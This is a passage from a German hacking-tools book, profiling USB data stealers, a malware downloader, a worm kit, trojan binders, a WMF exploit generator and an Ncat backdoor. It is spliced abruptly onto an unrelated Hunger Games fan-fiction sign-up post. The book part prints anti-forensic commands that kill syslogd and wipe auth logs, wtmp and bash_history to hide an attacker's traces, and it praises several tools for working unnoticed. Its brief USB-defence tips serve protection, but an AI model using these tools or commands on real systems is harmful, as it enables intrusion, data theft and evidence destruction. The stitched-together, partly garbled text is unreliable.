[email protected]:~# msfconsole 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888

=[ + -- --=[ + -- --=[ =[

metasploit v3.3.4-dev [core:3.3 api:1.0] 535 exploits – 254 auxiliary 198 payloads – 23 encoders – 8 nops svn r8854 updated today (2010.03.19)

msf >

Bild 9.1: Metasploit im Konsolenmodus

9.2

USBDUMPER 2

Anbieter

http://sugoistanley.wordpress. Preis com/2007/08/06/hacking-tools2007/

Betriebssystem(e) Windows 2000, Win XP, Win 2003, Win Vista, Win 7

Sprachen

Kategorie(n)

Spionagetool

Oberfläche

Größe

< 200 KB

Usability



Installation

Nein Know-how

-

GUI

CMD x

Schnittstellen 

Nach der völlig unauffälligen Installation (ohne Fenster etc.) auf einem Zielsystem werden in der Folge alle Daten von angeschlossenen USB-Sticks unbemerkt auf den Zielrechner übertragen. Damit ist das Tool sehr gut für öffentliche oder exponiert aufgestellte PCs geeignet, um private oder sonstige Daten zu speichern. Sobald der USBStick eingesetzt wird, beginnt die Datenübertragung, wobei für jeden Tag ein entsprechender Ordner auf dem Zielsystem erstellt wird. Man muss allerdings aufpassen, da auch eine am USB-Port angeschlossene Festplatte gedumpt wird und der Zielrechner

9.3 USB Switchblade / 7zBlade

95

dann schnell ans Ende seiner Speicherkapazität kommen kann. In der neuen Version können zusätzlich Makros in Office-Dokumente importiert werden.

Bild 9.2: Datensammler am USB-Port

9.3

USB Switchblade / 7zBlade

Anbieter

http://wiki.hak5.org17

Preis

-

Betriebssystem(e) Windows 2000, Win XP, Win 2003, Sprachen Win Vista, Win 7 Kategorie(n)

Spionagetool

Größe

< 1 MB

Usability



Oberfläche Installation

Nein Know-how

GUI

CMD x

Schnittstellen 

Während Switchblade für U3-Sticks entwickelt wurde, ist die 7zBlade-Variante für die klassischen USB-Sticks gedacht. Die Funktionsweise ist recht tricky: Beim Einstecken des Sticks in einen Host startet im Hintergrund ein VBS-Skript, das die Zieldateien auf die 17

Die Seite ist noch während der Überarbeitung unseres Buches aus dem Netz verschwunden. Switchblade kann derzeit noch auf www.raymond.cc/blog/archives/2007/11/23/hack-u3-usb-smart-drive-to-becomeultimate-hack-tool/ heruntergeladen werden.

96

Kapitel 9 – Sonstige Hackertools

Hostplatte kopiert, den Payload aus einem verschlüsselten 7z-Archiv entpackt, ausführt, die gesammelten Daten wieder verschlüsselt packt und die Ernte dann auf den Stick zurückkopiert. Anschließend werden alle Spuren auf dem Zielrechner gelöscht.

Bild 9.3: Ausbeute – Daten vom fremden Rechner

9.4

Net Tools

Anbieter

http://users.pandora.be/ahmadi

Preis

-

Betriebssystem(e) Win2000, WinXP, Win2003, Win NT 4.0

Sprachen

Englisch, Chinesisch

Kategorie(n)

Toolkit

Oberfläche

Größe

< 26 MB

Usability



Installation

Ja Know-how

GUI

Schnittstellen

x

CMD

Benötigt .NET Framework



Der größte Vorteil für erfahrene und weniger erfahrene Anwender: Unter einer einheitlichen Oberfläche finden sich Hunderte von mehr oder minder brauchbaren Angriffswerkzeugen, darunter mehrere Portscanner, Nmap (GUI und CMD), Netzwerksniffer, LAN-Monitore, Flooder, Spoofer, Passwortcracker etc. Also mit einem Wort: der ideale Experimentierkasten für angehende Forscher. Allerdings sollte der weniger erfahrene Attacker durchaus wissen, dass einige Tools den Rand zur Legalität überschreiten, z. B. wird kein Netzadmin begeistert sein, den Start einer DoS-Attacke mit einem HTTPFlood auf seine Seite zu erleben – mal ganz abgesehen davon, dass man den Angriffs-

9.5 Troll Downloader

97

ursprung sehr einfach zurückverfolgen kann. Ähnliches gilt für den Einsatz eines MassAuto-Mailers.

Bild 9.4: Alles, was man zum Hacken eines Netzwerks braucht

9.5

Troll Downloader

Anbieter

www.evileyesoftware.com

Preis

Betriebssystem(e)

Win200, Win2003, WinXP

Sprachen

Englisch

Kategorie(n)

Web Downloader

Oberfläche

GUI

Größe

< 300 KB

Usability



Installation

x

CMD -

Nein Schnittstellen Know-how



Ein schmutziger kleiner Geselle: Wird er auf einem Zielrechner ausgeführt (und ist das Opfer nicht durch eine neuere Firewall geschützt), lädt das Programm andere Programme (z. B. Keylogger, RATs etc.) nach und installiert sie auch gleich. Anschließend putzt sich das Programm selbst von der Platte, um die Spurensuche zu erschweren. In unserem Test funktionierte es großartig – allerdings wird der Server durch gängige Antivirentools erkannt, und auch die Firewall lässt es nur durch manuellen Eingriff passieren. Der Download nebst Installation der heruntergeladenen Malware erfolgte allerdings unbemerkt im Hintergrund.

98

Kapitel 9 – Sonstige Hackertools

Bild 9.5: Generieren eines Downloaders (Servermodul)

9.6

Czybik Gen Creation Kit

Anbieter

http://98.15.254.95/

Preis

-

Betriebssystem(e)

Win200, Win2003, WinXP

Sprachen

Englisch

Kategorie(n)

Wurmbaukasten

Oberfläche

GUI

Größe

< 500 KB

Nein Schnittstellen

Usability



Installation

Know-how

x

CMD -



Schon etwas angejahrte Version eines Wurmbaukastens, der aber das Prinzip sehr gut veranschaulicht. Das Bedienungsprinzip ist simpel: Man klickt die Funktionen an, die der Wurm haben soll, inklusive gewünschter Verbreitungswege und Payload (Schadensfunktionen). Der Output in Form eines Visual Basic-Skripts kann jetzt an das ahnungslose Opfer verteilt werden.

9.7 WMF-Maker

99

Bild 9.6: Czybik Gen Creation Kit erstellt Würmer auf Knopfdruck

9.7

WMF-Maker

Anbieter

http://vx.netlux.org/

Preis

-

Betriebssystem(e)

Win200, Win2003, WinXP

Sprachen

Englisch

Kategorie(n)

Exploit

Oberfläche

GUI

Größe

< 500 KB

Usability



Installation

-

CMD x

Nein Schnittstellen Know-how



Das Programm wird über die Batchdatei wmf-maker.exe nte.exe (der Payload / die Schadfracht) gestartet und generiert dann die Datei evil.wmf, die umbenannt und entsprechend auf Webseiten eingebaut werden kann.

100

Kapitel 9 – Sonstige Hackertools

Bild 9.7: WMF-Exploit automatisiert

9.8

fEvicol

Anbieter

http://98.15.254.95/

Preis

Betriebssystem(e)

Win200, Win2003, WinXP

Sprachen

Englisch

Kategorie(n)

Joiner / Binder

Oberfläche

GUI

Größe

< 50 KB

Usability



Installation

x

CMD -

Nein Schnittstellen Know-how



Ein typischer und noch dazu sehr kompakter, etwas älterer Vertreter seiner Art. Er erlaubt es, Bilddateien mit ausführbaren Programmdateien zu verknüpfen. Andere Binder können auch zwei Programme (z. B. eine Bilddatei und eine ausführbare Datei) so verbinden, dass im Vordergrund ein nützliches Programm wie z. B. ein Bildschirmschoner geladen und im Hintergrund – vom Anwender unbemerkt – die eigentliche Schadensroutine gestartet wird.

9.9 0x333shadow

101

Bild 9.8: fEvicol verbirgt das Schadprogramm in einer Bilddatei.

9.9

0x333shadow

Anbieter / Entwickler

http://packetstormsecurity.nl

Preis

-

Betriebssystem(e)

Linux/UNIX, IRIX, FreeBSD,

Sprachen

Englisch

Solaris Kategorie(n)

Logfile-Cleaner

Oberfläche

Größe

< 2 MB

Nein / Ja

Usability



Installation / Kompilation

GUI

CMD x

Schnittstellen

Know-how



0x333shadow ist ein Logfile-Cleaner, mit dem sich verräterische Einträge in diversen Logfiles eines (Linux-/UNIX-)Systems entfernen lassen. 0x333shadow behandelt nicht nur Logfiles auf Textbasis, sondern auch binäre Dateien wie utmpx, wtmp, wtmpx und lastlog. Mit 0x333shadow lassen sich auch zeitgesteuerte Reinigungen durchführen, z. B. 60 Sekunden nach der Abmeldung vom zu säubernden Rechner. Ein Start des Logfile-Cleaners mit folgenden Parametern: •

-a (clean all default dirs (recursive scan) you can use even –m)



-i (string by search, choose it with sense ;))

bringt folgendes Ergebnis (aus Übersichtsgründen leicht gekürzt):

102

Kapitel 9 – Sonstige Hackertools

discordia:~# ./0x333shadow -a -i attacker.com [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*]

syslogd killed! Cleaning /var/log/btmp removed 0/0 Cleaning /var/log/exim4/mainlog removed 0/60 Cleaning /var/log/exim4/mainlog.1 removed 0/96 Cleaning /var/log/news/news.crit removed 0/0 Cleaning /var/log/news/news.err removed 0/0 Cleaning /var/log/news/news.notice removed 0/0 Cleaning /var/log/syslog removed 0/63 Cleaning /var/log/auth.log removed 0/281 Cleaning /var/log/debian-installer/messages removed 0/938 Cleaning /var/log/debian-installer/partman removed 0/3961 Cleaning /var/log/debian-installer/syslog removed 0/1788 Cleaning /var/log/debian-installer/cdebconf/questions.dat removed 0/1912 Cleaning /var/log/debian-installer/cdebconf/templates.dat removed 0/38497

[*] cleaning extra logs: [*] Cleaning /var/run/utmp removed 0/12 [*] error reading file /var/adm/wtmp or touching /var/adm/wtmp.tmp skipping. [*] error reading file /usr/adm/wtmp or touching /usr/adm/wtmp.tmp skipping. [*] error reading file /etc/wtmp or touching /etc/wtmp.tmp skipping. [*] Cleaning /var/log/wtmp removed 1/242 [*] error reading file /var/adm/utmpx or touching /var/adm/utmpx.tmp skipping. [*] Cleaning /var/log/debug removed 0/538 [*] founded /var/log/messages in /etc/syslog.conf if isn't empty log will be cleaned. [*] Cleaning /var/log/messages removed 0/1928 [*] founded /dev/xconsole in /etc/syslog.conf if isn't empty log will be cleaned.

Bild 9.9: 0x333shadow reinigt Logfiles von verräterischen Spuren

9.10

Logcleaner-NG

Anbieter /

Preis

-

Betriebssystem(e) Linux/UNIX, NetBSD, OpenBSD, FreeBSD

Sprachen

Englisch

Kategorie(n)

Logfile-Cleaner

Oberfläche

GUI

Größe

< 2 MB

Nein / Ja

Usability



Entwickler

www.packetstormsecurity.org/ UNIX/penetration/log-wipers

Installation / Kompilation

CMD

Schnittstellen

Know-how



x

9.10 Logcleaner-NG

103

Logcleaner-NG ist ein weiterer Logfile-Cleaner, mit dem sich verräterische Einträge in diversen Logfiles eines (Linux-/UNIX-)Systems entfernen lassen. Logcleaner-NG bearbeitet eine Vielzahl verschiedener Formate, wie beispielsweise textbasierte (syslog) und »normale« Logfiles (wtmp, utmp, lastlog, accounting logs), aber auch spezielle Logfiles wie samba, snort.alert, prelude und mod_security. Logcleaner-NG ermöglicht die Vergabe von Zeitstempeln, liest die Konfiguration des SYSLOG ein, bietet die Möglichkeit, eigene Logfiles zu verschlüsseln und beherrscht einen interaktiven Modus. Zusätzlich erschwert Logcleaner-NG durch das restlose Löschen (Wiping) von Daten die nachträgliche Forensik eines kompromittierten Rechners. Der Aufruf von Logcleaner-NG mit folgenden Parametern: •

-A

clean Default logfiles



-s

string

bringt folgendes Ergebnis:

discordia:~# ./logcleaner-ng -A -s attacker.com -----------------------------------------------------------------Logcleaner-NG *** * -----------------------------------------------------------------[STATUS] clearing /var/run/utmp [STATUS] clearing /var/log/wtmp [STATUS] clearing /var/log/lastlog [STATUS] clearing /var/log/samba/log.smbd [STATUS] clearing /var/log/samba/log.nmbd [STATUS] clearing /root/.bash_history [STATUS] clearing /var/log/exim4/mainlog [STATUS] Ignoring compressed [1] file: /var/log/exim4/mainlog.2.gz [STATUS] Ignoring compressed [1] file: /var/log/exim4/mainlog.3.gz [STATUS] clearing /var/log/exim4/mainlog.1 [STATUS] clearing /var/log/auth.log (...) [STATUS] clearing /var/log/syslog.0 [STATUS] clearing /var/log/vmware-tools-guestd [STATUS] Ignoring compressed [1] file: /var/log/syslog.3.gz [STATUS] clearing /var/log/syslog [STATUS] Ignoring compressed [1] file: /var/log/syslog.1.gz

Bild 9.10: Logcleaner-NG bei der Entfernung verräterischer Spuren aus diversen Logfiles

104

Kapitel 9 – Sonstige Hackertools

9.11

NakedBind

Anbieter

http://98.15.254.95/

Preis

-

Betriebssystem(e)

Win200, Win2003, WinXP

Sprachen

Englisch

Kategorie(n)

Joiner / Binder / Trojan Dropper

Oberfläche

GUI

Größe

< 100 KB

Nein Schnittstellen

Usability



Installation

Know-how

x

CMD -



Das Programm bietet fast alles, was man sich wünscht: Es bindet mehrere Dateien zusammen, verschlüsselt das Endprodukt und erlaubt es, unterschiedliche Startkonfigurationen festzulegen.

Bild 9.11: Der Trojan Dropper NakedBind lässt in puncto Ausstattung kaum Wünsche offen.

9.12 Ncat (Nmap-Suite)

9.12

105

Ncat (Nmap-Suite)

Anbieter / Entwickler

http://nmap.org/ncat

Preis

Betriebssystem(e)

Linux/UNIX, Mac OS X, BSD, Sprachen

Englisch

Solaris, Windows Kategorie(n)

Netzwerktool

Oberfläche

Größe

< 2 MB

Nein / Ja

Usability



Installation / Kompilation

GUI

CMD

x

Schnittstellen

Know-how



Ncat, der inoffizielle Nachfolger des populären Netcat, ist ein überaus mächtiges Netzwerkprogramm, welches den Transport von Daten von der Standardein- und -ausgabe über TCP- oder UDP-Netzwerkverbindungen ermöglicht. Ncat kann ausgehende und eingehende Verbindungen zu oder von jedem Port senden – mittlerweile auch SSL-verschlüsselt –, besitzt volle DNS-Forward-Lookup- und Reverse-Lookup-Überprüfung, kann jeden lokalen Quellport und jede lokal konfigurierte Netzwerkquelladresse verwenden, beherrscht bewegliches Quellrouting und besitzt zusätzlich einen praktischen Broker-Mode, der beispielsweise einen einfachen Chat-Server ermöglicht. Der Versand einer Datei vom Quell-PC auf einen Ziel-PC über Port 10023/TCP ist mit folgenden Parametern möglich: •

-l, --listen (bind and listen for incoming connections)



-v, --verbose (set verbosity level (can be used up to 3 times))



-p, --source-port specify source port to use)

Eingabe auf dem Opfer-PC (Empfänger):

victim:~# ncat -l -v -p 10023 >datei Ncat: Version 5.20 ( http://nmap.org/ncat ) Ncat: Listening on 0.0.0.0:10023 Ncat: Connection from attacker.org. victim:~#

Bild 9.12: Ncat empfängt eine Datei

Eingabe auf den Quell-PC (Versender):

discordia:~# ncat -v victim.org 10023 media/cdrom dev etc

Bild 9.15: Ncat öffnet die Hintertür des Zielrechners

9.13

GNU MAC Changer (macchanger)

Anbieter

www.alobbs.com/macchanger

Preis

-

Betriebssystem(e) Linux/UNIX

Sprachen

Englisch

Kategorie(n)

Tool zum Verändern der MAC-Adresse

Oberfläche GUI

Größe

< 2 MB

Usability



Installation / Kompilation

Ja

CMD x

Schnittstellen Know-how



9.14 Abwehr – generelle Tipps

107

Durch den GNU MAC Changer lassen sich MAC-Adressen von Netzwerkkarten modifizieren. Bei Wardrivern (Leuten, die systematisch nach offenen WLANs suchen) gehört der GNU MAC Changer zur Standardausrüstung, ermöglicht das Tool doch eine Verschleierung der tatsächlichen MAC-Adresse der WLAN-Karte und trägt dazu bei, möglichst wenig verwertbare Spuren beim Opfer zu hinterlassen. Der Einsatz des GNU MAC Changer, hier demonstriert an der willkürlichen Vergabe einer MAC-Adresse am Netzwerkinterface eth1: •

-r (set fully random MAC)

bringt folgendes Ergebnis:

[email protected]:~# macchanger -r eth1 Current MAC: 00:40:96:43:f1:fc [wireless] (Cisco/Aironet 4800/340) Faked MAC: 70:9d:e8:5a:98:86 (unknown) [email protected]:~#

Bild 9.16: GNU MAC Changer bei der Vergabe einer willkürlichen MAC-Adresse

9.14

Abwehr – generelle Tipps

Einige der hier vorgestellten Tools werden von den gängigen AV-Systemen als Schädlinge erkannt und unmittelbar bekämpft. Etwas anders sieht die Sache mit den USBAngriffen durch USBDumper und 7zBlade sowie verwandten Tools aus. Betroffen sind sowohl Heim- als auch Firmennetzwerke. Die USB-Ports mit Kunstharz zu versiegeln, würde Abhilfe schaffen, aber die Usability der Workstations stark beeinträchtigen (natürlich ginge das auch softwaretechnisch, indem einfach der USB-Treiber USBSTOR.SYS aus dem Windows-Verzeichnis gelöscht wird). Alternativ können auch verschiedene für den USB-Betrieb notwendige Dateien wie die %SystemRoot%\ Inf\Usbstor.pnf+Usbstor.inf über einen »Berechtigung-verweigern-Eintrag« auf Dateiebene gesperrt werden. Flexibler, aber auch kostenaufwendiger ist der Einsatz von Programmen, die USB-Sticks und -Festplatten registrieren und den unzulässigen Gebrauch nicht freigegebener Geräte einschränken, z. B. mit Tools wie DeviceLock (www.devicelock.com) oder itWatch (www.itwatch.de). Flankierend dazu muss natürlich das Booten via USB-Medien unterbunden werden. Im Privatbereich und bei geringer Sicherheitsbedrohung reicht es ggf. aus, die Autostartrampen zu blockieren, sodass ein verseuchter Stick nicht automatisch vom System aktiviert wird.

109

10 Wireless Hacking Die Beliebtheit von Wireless LAN ist ungebrochen – vor allem im privaten Umfeld. Dafür sprechen natürlich vor allem Bequemlichkeitsgründe. Wer keine Lust hat, durch seine Wohnung Leitungen zu ziehen, und den Luxus liebt, mit dem mobilen Empfangsgerät überall in Haus und Garten frei nach Lust und Laune surfen zu können, setzt auf WLAN. Obwohl es eine Vielzahl von Standards (IEEE 802.11a, IEEE 802.11b, IEEE 802.11g, IEEE 802.11h, IEEE 802.11n) und Übertragungsraten (54 bis 600 Mbps) gibt, hat das kabellose lokale Netzwerk ein grundsätzliches Problem: Es ist leicht angreifbar und viele Hacker betreiben Wardriving, das Scannen von offenen und geschützten Funknetzen, als eine Art Sport. Als Schutzmaßnahme wird vor allem Wi-Fi Protected Access (WPA / WPA2) eingesetzt, das mit AES-Verschlüsselung arbeitet und durch Wörterbuchattacken angegriffen werden kann. Teilweise findet sich jedoch immer noch das auf 40- oder 104-Bit-Schlüsseln beruhende und leicht zu knackende Wired Equivalent Privacy (WEP). Die hier vorgestellten Angriffstools arbeiten auf unterschiedlichen Ebenen: Im ersten Schritt wird der Angreifer nach Access-Points suchen, die als »drahtloser Hub« alle empfangenen Signale in das jeweilige Netzwerk weiterleiten. Im zweiten Schritt wird er die Art der WLAN-Absicherung (Open Node = ungesichertes Netzwerk; Closed Node = geschlossenes WLAN-Netzwerk, WEP-Node = verschlüsseltes Netzwerk) ermitteln und versuchen, sich in den Netzwerkverkehr einzuklinken. Das Mithören bzw. Mitschneiden des Datenverkehrs (Sniffen) funktioniert ähnlich wie in drahtgebundenen Netzen, und im Prinzip können auch die gleichen Tools dafür eingesetzt werden. Bei mit WEP verschlüsselten Netzwerken braucht man, um sich aktiven Zugang zu verschaffen, 50.000 bis 1.500.000 Pakete für die Schlüsselgenerierung. Fallen diese benötigten Datenpakete nicht an, da z. B. in dem beobachteten WLAN kaum Traffic aufläuft, lassen sich die Pakete, die zur Errechnung des verwendeten WEP-Schlüssels notwendig sind, auch künstlich generieren. Abgerundet werden die Angriffstools durch Programme, mit denen sich MAC- und IP-Adresse fälschen (spoofen) lassen, um quasi »legitimer« Mitbenutzer des Netzes zu werden.

110

Kapitel 10 – Wireless Hacking

10.1

Kismet-Newcore

Anbieter www.kismetwireless.net Betriebssystem(e) Linux/UNIX, OpenBSD, FreeBSD, NetBSD, Mac OS X, Windows (Cygwin) Kategorie(n) WLAN-Sniffer Größe < 10 MB Installation / Kompilation

Usability



Preis Sprachen

Englisch

Oberfläche GUI x CMD Nein / Schnittstellen Ethereal/Tcpdump, Ja Aircrack-NG, Airsnort, GPSD, GpsDrive, Festival, Flite, PluginManagement Know-how 

Das Programm Kismet-Newcore ist ein leistungsfähiger WLAN-Sniffer, der Funknetzwerke durch das passive Sammeln von Informationen identifiziert und selbst vor versteckten Funknetzen (hidden (E)SSID) nicht haltmacht. Kismet-Newcore ist der Freund eines jeden Funkforschers, da das Programm extrem leistungsfähig ist, sich durch zahlreiche Plugins erweitern lässt (u. a. durch DECT) und viele Optionen bietet: So können durch Kismet-Newcore entdeckte Funknetze z. B. nicht nur durch akustische Signale bemerkbar gemacht, sondern sogar »vorgelesen« werden (inklusive SSID/Name, Kanal und Status der WLAN-Verschlüsselung). Befindet sich ein GPS-Empfänger am Computer, zeichnet Kismet zusätzlich die Koordinaten entdeckter Funknetze auf. Die Funknetze lassen sich später mit Zusatzprogrammen kartografieren. Der Aufruf von Kismet-Newcore auf einer Konsole bringt u. a. folgendes Ergebnis: discordia:~# kismet

10.2 Aircrack-NG (Aircrack-NG-Suite)

111

Bild 10.1: Kismet beim Sichten von Funknetzen

10.2

Aircrack-NG (Aircrack-NG-Suite)

Anbieter

www.aircrack-ng.org

Preis

-

Betriebssystem(e)

Linux/UNIX, Windows, Mac OS X

Sprachen

Englisch

Kategorie(n)

WEP und WPA-PSK/WPA2Cracker

Oberfläche

GUI

Größe

< 2 MB

Nein / Schnittstellen Ja

Airodump-NG, Kismet-Newcore

Usability



Know-how



Installation / Kompilation

CMD x

Aircrack-NG ist eine Toolsammlung für Wireless-Hacking, die Sniffing- und InjectionTools sowie einen WEP- und WPA/WPA2-Cracker für Wireless-Netzwerke beinhaltet. Die Aircrack-NG-Suite enthält u. a. die Programme aircrack-ng zur Brechung von WEPund WPA-PSK-Netzen, airodump-ng zur Suche und zum Mitschneiden von WLANVerkehr und aireplay-ng zur Injektion von WLAN-Paketen. Aircrack-NG kann bei einer ausreichenden Anzahl mitgeschnittener WLAN-Pakete bzw. schwacher WEP IVs (Initialisierungsvektoren) den verwendeten WEP-Schlüssel errechnen. Je nach Länge des WEP-Schlüssels benötigt das Programm für 64-Bit-Schlüssel durchschnittlich 100.000 bis 250.000 IVs, bei 128-Bit-Schlüsseln sogar durchschnittlich 500.000 bis 1.000.000 gesammelter IVs.

112

Kapitel 10 – Wireless Hacking

Bild 10.2: Aircrack-NG beim Errechnen eines WEP-Schlüssels

10.3

Aireplay-NG (Aircrack-NG-Suite)

Anbieter

www.aircrack-ng.org

Preis

-

Betriebssystem(e)

Linux/UNIX, Windows, Mac OS X

Sprachen

Englisch

Kategorie(n)

Источник: https://kupdf.net/download/networkhacking-professionelleangriffs-undverteidigungstechnikengegenhackerunddatendiebeedition2_5af361e4e2b6f5fc6c325245_pdf

Welcome everyone to my ninth ever Hunger Games! In my last games, The 399th Annual Hunger Games, Anais Morrisa from District 1 and created by Pippycat was crowned victor. These Games have a special twist added to them as well, a very special twist that will make these my biggest, boldest, and bloodiest Games yet!

Introduction

This year the Hunger Games will be a Quell, a very special Quell at that. This year the Games will contain ninety-two tributes. Yes, ninety-two! Thirty-two of them will be Reaped from District's 0 through 14 and the Capitol, another thirty-two will be voted upon by citizens of the Capitol. These tributes will be tributes from the 327th, 398th, and 399th Hunger Games. The tributes with the most votes will be revived and and sent back into the Games to compete again. And the final twenty-eight will be tributes who competed in the 300th, 301st, 302nd, 325th, & 326th Games. However, unlike the tributes from the newer Games, these tributes will not be voted in. Instead, these tributes will be divided by District, placed into a large location that matches the District's import, and be forced to fight to the death until only two remain. These two tributes will then be inserted into the Games along with the new tributes and the voted in tributes, bringing the total amount of tributes competing to ninety-two.

Rules

1: There will be ninety-two Tributes, 32 tributes who competed in my 327th, 398th, and 399th Games, 28 tributes who competed in my 300th, 301st, 302nd, 325th, & 326th Games, and finally, there will be 32 new tributes

2: You may submit up two new Tributes

3: Because of the sheer amount of tributes, sponsoring will not be in these Games, at least not at first. Once the numbers begin to dwindle then sponsoring will be reinstated

4: I will write Reapings, Group Training, and of course the actual Games

5: I will not accept any Tributes that have been in my previous Games (that's what the All-Stars' are for)

6: Reservations last exactly 48 hours (this may be extended in certain cases)

7: The Capitol is a Career district in my Games

8: Because of the size of these Games, I anticipate it will take a long time for them to finish. If you're not comfortable joining a Games that will last many months than I'd advise you refrain from joining.

9: Tribute Form: (for new tributes)

Name:

District:

Gender:

Age:

Personality:

Back-story:

Height:

Appearance:

Weapon(s):

Strengths:

Weaknesses:

Fear(s):

Bloodbath Strategy:

Alliance: (can be filled out later)

Training Strategy: (how they will behave in training)

Choosing All-Stars

1: There will be three factors that will decide who will compete again.  First of which is votes.  I'll explain how it works below. 

Each user can vote for one tribute per slot, and de-vote one tribute per slot. (Example: You can only vote for 1 D1 male and de-vote one D1 male) A devote means that you DO NOT want that tribute, and one vote will be taken away from them instead. (Example: Vote: Edmund Everton, De-Vote: Marcio Redge Edmund would be at one, Marcio at -1)

Here is the vote template: (Just copy and paste this in the comments and bold which tribute you are voting for, and italicize the tribute you are de-voting.)

The three Games are...

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/327th_Annual_Hunger_Games_(All-Stars)

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/398th_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/399th_Annual_Hunger_Games

Start copy and pasting HERE:


District 0 Male: Solar Energy (398) & Fenrir Amarth (399)

District 0 Female: Aelia Freedome (398) & Bailey Snowbelle (399)

District 1 Male: Dragon Lord (327), Trevor Gold (398), & Jake Locketback (399)

District 1 Female: Glique Dumofitz (327), Astrid Bellia (327), & Trinity Mace (398)

District 2 Male: Julius Paris (327), Hatch Scright (327), Luigi Wilkins (398), & Hammer Time (399)

District 2 Female: Jerica Straddler (327), Ella Massey (327), Avia Stafford (398), & Carmine Morrisa (399)

District 3 Male: Wario Wade (327), Courage Blitz (327), Shuppet Jorravaskr (398), Aspen Bolts (399)

District 3 Female: Annabeth March (327), Sombra Celesta (398), & Iris Pixel (399)

District 4 Male: Percy Grace (327), Ryan Marine (327), Nikki Heart (398), & Kaye Ocelote (399)

District 4 Female: Zia Grace (327) Swatty Lakeside (327), Scarlet Avalon (398), & Mizu Fall (399)

District 5 Male: Woody Chopper (327), Kodai Hitogoroshi (327), Johnathan Mikeal (398), & Clark Stevens (399)

District 5 Female: Augusta Winters (327), Trick Treat (327), Lucinda Kidd (398), & Missy Turner (399)

District 6 Male: Blade Spectrus (327), Train McBridge (327), & Julio Fall (399)

District 6 Female: Alissa Metal Beam (327), Mimic Slaughter (327) A Amore Madness (398), & Rosalie Sonnet (399)

District 7 Male: Hybrid Three (327), Shade Spectrus (327), Nick Maclachlan (398), & Henry Polyester (399)

District 7 Female: Marcia Callamezzo (327), Willow Firethorn (327), Fiora Waltz (398), & Arbor Alpine (399)

District 8 Male: Rufus Silks (327), Dome Citadel (327), Banette Tsukomogami (398), & Colin Bisset (399)

District 8 Female: Evelyn Dinstra (327), Cashmere Prada (327), Aisha Hakeem (398), & Kim Carett (399)

District 9 Male: Hunter Davila (327), Jake Price (327), Lyman Milton (398), & Jac Price (399)

District 9 Female: Alicia Haze (327), Varina Tapora (327), Juline Cenia (398), & Azalea Finch (399)

District 10 Male: Twix Cinders (327), Vlad Rockford (327), Stephen Star (398), & Billy McGranger (399)

District 10 Female: Bella Mustang (327), Vivan Incomstanti (327), Cleopatra Royalty (398), & Fawn Talons (399)

District 11 Male: Gloom Ivy (327), Darker Horrfi (327), Crimson Typhoon (398), & Bellamy Blake (399)

District 11 Female: Daisy Lilac (327), Mondi Bakerman (327), Raven Night (398), & Octavia Blake (399)

District 12 Male: Exolian Dynamite (327), Drago Fire (398), & Ganta Alomo (399)

District 12 Female: Rio Flock (327), Amaryllis Silvermoon (327), Celica Rotas (398) & Misty Honeysuckle (399)

District 13 Male: Kingsley Orion (327), Ice Hunts (327), Radiant Tayz (325), & Luxio Sertralium (399)

District 13 Female: Celia Myer (327), Piper Quinn (327), Zoey Proasheck (398) & Alexandrite Bohamia (399)

District 14 Male: Odin Amarth (398) & Luxray Meganium (399)

District 14 Female: Angel Orthodox (398) & Amaya Lovelace (399)

Capitol Male: Dusk Olive (327), Ramon Constancy (327), Furcifer Soror (398), & Iggy Coupe (399)

Capitol Female: Dawn Olive (327), Aemillia Wonder (398), Flame Vapore (399)

Stop copy and pasting HERE:

2: The other factors in deciding who will be selected is  1: My personal preference. Basically, If I like the tribute it has a better chance of getting in. and 2: Detail. If a tribute wasn't very detailed or interesting the first time it competed, it likely won't get in this time.

3. After all the votes and de-votes are counted (I will allow a week for voting), I will pick the tributes using the other categories as well.

3. Please do not pick tributes because you are friends with their creator, etc. Pick the tribute you find most interesting due to backstory, you liked reading about them etc.. It would probably be a good idea to read my past Games if you haven't already. Oh, and of course, you can vote for your own tributes.

4. In case the tributes have creators who are no longer active, I will assign people to mentor those tributes. So don't not vote for a tribute because their creator isn't active.

5: Don't worry. I'll make sure that the amount of tributes people have is even. Example, one person won't have like six All-Stars.

​ All-Stars Part 2

The other twenty-eight All-Stars will not be voted upon. No, they will have to earn their second chance at the Games through an all-out battle to the death. 

These duels will be between every tribute from my 300th through 326th Games. Yes, every tribute except for Victors and the tributes who were voted into the 327th Games. They will be exempt from this death duel and instead be included in the voting process. 

All the other tributes however, will be separated by District and inserted into the Death Duels. The duels themselves will take place in a enclosed environment, either outside or inside, and weapons may be provided. There will be no possibility of escape. The only way the duels end Is when only two tributes remain living. All others must be dead. 

In short, the duels will be like a miniature bloodbath where everyone must fight and kill until there is only two tributes left standing. At this point, the Duel ends and the two winners will join the Reaped tributes and the voted in All-Stars in the Games.

The five Games that these tributes are from will be listed below...

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/The_300th_Annual_Hunger_Games:

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/301st_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/302nd_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/325th_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/326th_Annual_Hunger_Games


The tributes who will compete in each duel are...

District 1 Duel: Elvis Alexander (300), Cole Harrison (325), Karma Blood (325), Warwickite Jewelly (326), Diamond Coman (301), Raven Armor (302), Skylar Windbreeze (325), Artemis Grace (325), & Kate Willis (326)

District 2 Duel: Johnny Clarke (300), Damian Weatherby (301), Drewsiff Bloodwonky (302), Yuki Kokyu (325), Jeffrey Killheart (326), Bethany Clarke (300), Pansy Costello (301), Onyx Eboni (302), Chloe Black (325), & Teresa Silver (325

District 3 Duel: Noah Everest (300), Elecc Commission (325), Chip Parks (325), Rebel Groots (326), Di Thorn (300), Bethunia Underium (301), Syren Song (302), Elecctronny Watson (325), & Vision Faith (325)

